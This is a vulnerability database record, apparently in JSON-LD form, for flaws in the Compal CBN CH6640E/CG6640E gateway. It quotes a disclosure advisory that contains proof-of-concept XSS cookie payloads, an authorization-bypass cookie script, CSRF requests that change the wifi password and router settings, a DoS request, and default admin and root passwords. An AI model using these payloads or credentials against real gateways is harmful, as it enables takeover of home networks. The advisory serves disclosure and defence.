Denial of Service (DoS) for all WiFi connected clients (disconnect)
GET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1
Stored Cross-Site Scripting (XSS) Vulnerability
Cookie: userData Value: hax0r">alert(document.cookie);
--
document.cookie="hax0r">alert(document.cookie);; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/";--
Cross-Site Request Forgery (CSRF) Vulnerability
DDNS config:
GET http://192.168.0.1/basicDDNS.html?DdnsService=1&DdnsUserName=a&DdnsPassword=b&DdnsHostName=c# HTTP/1.1
Change wifi pass:
GET http://192.168.0.1/setWirelessSecurity.html?Ssid=0&sMode=7&sbMode=1&encAlgm=3&psKey=NEW_PASSWORD&rekeyInt=0 HTTP/1.1
Add static mac address (static assigned dhcp client):
GET http://192.168.0.1/setBasicDHCP1.html?action=add_static&MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF&LeasedIP=8 HTTP/1.1
Enable/Disable UPnP:
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=1 HTTP/1.1 (enable)
GET http://192.168.0.1/setAdvancedOptions.html?action=apply&instance=undefined&UPnP=2 HTTP/1.1 (disable)
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201411-0176",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "cg6640e wireless gateway",
"scope": "eq",
"trust": 1.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "",
"scope": "eq",
"trust": 1.6,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "ch664oe wireless gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "ch6640e wireless gateway",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "1.0"
},
{
"model": "networks",
"scope": "eq",
"trust": 0.8,
"vendor": "compal broadband",
"version": "ch6640-3.5.11.7-nosh"
},
{
"model": "broadband networks inc cg6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks inc ch6640e wireless gateway",
"scope": "eq",
"trust": 0.6,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks ch6640-3.5.11.7-nosh",
"scope": null,
"trust": 0.3,
"vendor": "compal",
"version": null
},
{
"model": "broadband networks ch664oe wireless gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "compal",
"version": "1.0"
},
{
"model": "broadband networks cg6640e wireless gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "compal",
"version": "1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "model: ch6640 and ch6640e"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "hardware version: 1.0"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "firmware version: ch6640-3.5.11.7-nosh"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "boot version: pspu-boot(bbu) 1.0.19.25m1-cbn01"
},
{
"model": "ch",
"scope": "eq",
"trust": 0.1,
"vendor": "compal broadband cbn",
"version": "docsis mode: docsis 3.0"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "80057"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:cg6640e_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:compal_broadband_networks:ch664oe_wireless_gateway",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:compal_broadband_networks:firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "LiquidWorm",
"sources": [
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
}
],
"trust": 0.7
},
"cve": "CVE-2014-8653",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2014-8653",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2014-07893",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-76598",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-8653",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2014-8653",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201410-1374",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "ZSL",
"id": "ZSL-2014-5203",
"trust": 0.1,
"value": "(3/5)"
},
{
"author": "VULHUB",
"id": "VHN-76598",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2014-8653",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting (XSS) vulnerability in Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH allows remote attackers to inject arbitrary web script or HTML via the userData cookie. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to exploit vulnerabilities to bypass authorized access to sensitive information, perform cross-site scripting, cross-site request forgery, and denial of service attacks. Firmware is prone to a cross-site scripting vulnerability. \nProduct web page: http://www.icbn.com.tw\nAffected version: Model: CH6640 and CH6640E\n Hardware version: 1.0\n Firmware version: CH6640-3.5.11.7-NOSH\n Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01\n DOCSIS mode: DOCSIS 3.0\n\n\nSummary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home,\nhome office, or small business/enterprise. It can be used in households with\none or more computers capable of wireless connectivity for remote access to\nthe wireless gateway. \n\nDefault credentials:\n\nadmin/admin - Allow access gateway pages\nroot/compalbn - Allow access gateway, provisioning pages and provide more\n configuration information. 
\n\nTested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7\n\n\nVulnerabilities discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2014-5203\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php\n\n\n04.10.2014\n\n---\n\n\n\nAuthorization Bypass Information Disclosure Vulnerability\n#########################################################\n\nhttp://192.168.0.1/xml/CmgwWirelessSecurity.xml\nhttp://192.168.0.1/xml/DocsisConfigFile.xml\nhttp://192.168.0.1/xml/CmgwBasicSetup.xml\nhttp://192.168.0.1/basicDDNS.html\nhttp://192.168.0.1/basicLanUsers.html\nhttp://192.168.0.1:5000/rootDesc.xml\n\nSet cookie: userData to root or admin, reveals additional pages/info. \n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"userData=root; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nDenial of Service (DoS) for all WiFi connected clients (disconnect)\n###################################################################\n\nGET http://192.168.0.1/wirelessChannelStatus.html HTTP/1.1\n\n\nStored Cross-Site Scripting (XSS) Vulnerability\n###############################################\n\nCookie: userData\nValue: hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e\n\n--\n\u003chtml\u003e\n\u003cbody\u003e\n\u003cscript\u003e\ndocument.cookie=\"hax0r\"\u003e\u003cscript\u003ealert(document.cookie);\u003c/script\u003e; expires=Thu, 09 Dec 2014 11:05:00 UTC; domain=192.168.0.1; path=/\";\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n--\n\n\nCross-Site Request Forgery (CSRF) Vulnerability\n###############################################\n\nDDNS config:\n------------\n\nGET http://192.168.0.1/basicDDNS.html?DdnsService=1\u0026DdnsUserName=a\u0026DdnsPassword=b\u0026DdnsHostName=c# HTTP/1.1\n\n\nChange wifi pass:\n-----------------\n\nGET 
http://192.168.0.1/setWirelessSecurity.html?Ssid=0\u0026sMode=7\u0026sbMode=1\u0026encAlgm=3\u0026psKey=NEW_PASSWORD\u0026rekeyInt=0 HTTP/1.1\n\n\nAdd static mac address (static assigned dhcp client):\n-----------------------------------------------------\n\nGET http://192.168.0.1/setBasicDHCP1.html?action=add_static\u0026MacAddress=38%3A59%3AF9%3AC3%3AE3%3AEF\u0026LeasedIP=8 HTTP/1.1\n\n\nEnable/Disable UPnP:\n--------------------\n\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=1 HTTP/1.1 (enable)\nGET http://192.168.0.1/setAdvancedOptions.html?action=apply\u0026instance=undefined\u0026UPnP=2 HTTP/1.1 (disable)\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-8653"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "BID",
"id": "80057"
},
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"db": "PACKETSTORM",
"id": "128860"
}
],
"trust": 2.79
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/cbn_mv.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-76598",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=35075",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "VULMON",
"id": "CVE-2014-8653"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-8653",
"trust": 3.6
},
{
"db": "EXPLOIT-DB",
"id": "35075",
"trust": 3.0
},
{
"db": "BID",
"id": "70762",
"trust": 2.8
},
{
"db": "ZSL",
"id": "ZSL-2014-5203",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "128860",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "113839",
"trust": 1.9
},
{
"db": "XF",
"id": "98328",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-07893",
"trust": 0.6
},
{
"db": "BID",
"id": "80057",
"trust": 0.5
},
{
"db": "XF",
"id": "98329",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113843",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113838",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113836",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113842",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113841",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113840",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "113837",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2014100162",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-76598",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2014-8653",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"db": "BID",
"id": "80057"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"id": "VAR-201411-0176",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76598"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-07893"
}
]
},
"last_update_date": "2025-04-13T23:14:41.475000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.icbn.com.tw/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2014-5203.php"
},
{
"trust": 2.2,
"url": "http://www.securityfocus.com/bid/70762"
},
{
"trust": 2.1,
"url": "http://www.exploit-db.com/exploits/35075"
},
{
"trust": 1.9,
"url": "http://osvdb.org/show/osvdb/113839"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/128860/cbn-ch6640e-cg6640e-wireless-gateway-xss-csrf-dos-disclosure.html"
},
{
"trust": 1.2,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/98328"
},
{
"trust": 1.0,
"url": "http://www.exploit-db.com/exploits/35075/"
},
{
"trust": 1.0,
"url": "http://xforce.iss.net/xforce/xfdb/98328"
},
{
"trust": 0.9,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8653"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-8653"
},
{
"trust": 0.1,
"url": "http://cxsecurity.com/issue/wlb-2014100162"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113836"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113837"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113838"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113840"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113841"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113842"
},
{
"trust": 0.1,
"url": "http://osvdb.org/show/osvdb/113843"
},
{
"trust": 0.1,
"url": "http://packetstormsecurity.com/files/128860"
},
{
"trust": 0.1,
"url": "http://xforce.iss.net/xforce/xfdb/98329"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8653"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8654"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8655"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8656"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-8657"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8654"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8655"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8656"
},
{
"trust": 0.1,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-8657"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.securityfocus.com/bid/80057"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basiclanusers.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/docsisconfigfile.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwbasicsetup.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setwirelesssecurity.html?ssid=0\u0026smode=7\u0026sbmode=1\u0026encalgm=3\u0026pskey=new_password\u0026rekeyint=0"
},
{
"trust": 0.1,
"url": "http://192.168.0.1:5000/rootdesc.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=1"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/xml/cmgwwirelesssecurity.xml"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/wirelesschannelstatus.html"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setbasicdhcp1.html?action=add_static\u0026macaddress=38%3a59%3af9%3ac3%3ae3%3aef\u0026leasedip=8"
},
{
"trust": 0.1,
"url": "http://www.icbn.com.tw"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/basicddns.html?ddnsservice=1\u0026ddnsusername=a\u0026ddnspassword=b\u0026ddnshostname=c#"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/setadvancedoptions.html?action=apply\u0026instance=undefined\u0026upnp=2"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"db": "BID",
"id": "80057"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"db": "VULHUB",
"id": "VHN-76598"
},
{
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"db": "BID",
"id": "80057"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"db": "PACKETSTORM",
"id": "128860"
},
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-10-25T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULHUB",
"id": "VHN-76598"
},
{
"date": "2014-11-06T00:00:00",
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "80057"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"date": "2014-10-28T00:59:24",
"db": "PACKETSTORM",
"id": "128860"
},
{
"date": "2014-10-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"date": "2014-11-06T15:55:10.757000",
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-11-07T00:00:00",
"db": "ZSL",
"id": "ZSL-2014-5203"
},
{
"date": "2014-11-10T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-07893"
},
{
"date": "2017-09-08T00:00:00",
"db": "VULHUB",
"id": "VHN-76598"
},
{
"date": "2017-09-08T00:00:00",
"db": "VULMON",
"id": "CVE-2014-8653"
},
{
"date": "2014-11-06T00:00:00",
"db": "BID",
"id": "80057"
},
{
"date": "2014-11-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-005240"
},
{
"date": "2014-11-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201410-1374"
},
{
"date": "2025-04-12T10:46:40.837000",
"db": "NVD",
"id": "CVE-2014-8653"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Compal Broadband Networks of CH6640E and CG6640E Wireless Gateway Firmware cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-005240"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201410-1374"
}
],
"trust": 0.6
}
}
VAR-201411-0179
Vulnerability from variot - Updated: 2025-04-13 23:14
The Compal Broadband Networks (CBN) CH6640E and CG6640E Wireless Gateway 1.0 with firmware CH6640-3.5.11.7-NOSH have a default password of (1) admin for the admin account and (2) compalbn for the root account, which makes it easier for remote attackers to obtain access to certain sensitive information via unspecified vectors. The CBN CH6640E and CG6640E are wireless gateway devices. CBN CH6640E and CG6640E have multiple security vulnerabilities that allow an attacker to bypass authorization to access sensitive information and to perform cross-site scripting, cross-site request forgery, and denial-of-service attacks.
1. Multiple information-disclosure vulnerabilities
2. A denial-of-service vulnerability
3. An HTML-injection vulnerability
4. Other attacks are also possible. A remote attacker could exploit this vulnerability to gain access to sensitive information.
Product web page: http://www.icbn.com.tw
Affected version: Model: CH6640 and CH6640E
Hardware version: 1.0
Firmware version: CH6640-3.5.11.7-NOSH
Boot version: PSPU-Boot(BBU) 1.0.19.25m1-CBN01
DOCSIS mode: DOCSIS 3.0
Summary: The CBN CH6640E/CG6640E Wireless Gateway is designed for your home, home office, or small business/enterprise. It can be used in households with one or more computers capable of wireless connectivity for remote access to the wireless gateway.
Default credentials:
admin/admin - Allows access to gateway pages
root/compalbn - Allows access to gateway and provisioning pages and provides more configuration information.
Tested on: Compal Broadband Networks, Inc/Linux/2.6.39.3 UPnP/1.1 MiniUPnPd/1.7
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
Advisory ID: ZSL-2014-5203
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5203.php
04.10.2014
Authorization Bypass Information Disclosure Vulnerability
http://192.168.0.1/xml/CmgwWirelessSecurity.xml
http://192.168.0.1/xml/DocsisConfigFile.xml
http://192.168.0.1/xml/CmgwBasicSetup.xml
http://192.168.0.1/basicDDNS.html
http://192.168.0.1/basicLanUsers.html
http://192.168.0.1:5000/rootDesc.xml
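Setting the userData cookie to root or admin reveals additional pages/info; the gateway takes the access level from this client-supplied cookie value rather than from an authenticated session.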
--
